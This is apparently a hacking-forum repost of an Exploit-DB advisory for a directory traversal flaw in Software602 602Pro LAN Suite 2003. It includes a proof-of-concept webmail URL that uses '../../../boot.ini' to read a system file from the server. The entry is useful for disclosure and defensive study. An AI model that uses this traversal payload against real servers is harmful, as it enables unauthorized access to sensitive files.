Exploit software602 602pro lan suite 2003 - Directory Traversal

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
23185
Проверка EDB
  1. Пройдено
Автор
PHUONG NGUYEN
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
N/A
Дата публикации
2003-09-25
Код:
source: https://www.securityfocus.com/bid/8701/info

A problem with the handling of directory traversal requests has been identified in Software602 602Pro LAN SUITE 2003. Because of this, an attacker may be able to gain access to potentially sensitive information. 

http://www.example.com/mail/m602cl3w.exe?A=GetFile&USER=7921604D7A587937986E24242C0588&DL=0&FN=../../../boot.ini

where USER signifies the current webmail user's username.
 
Источник
www.exploit-db.com

Похожие темы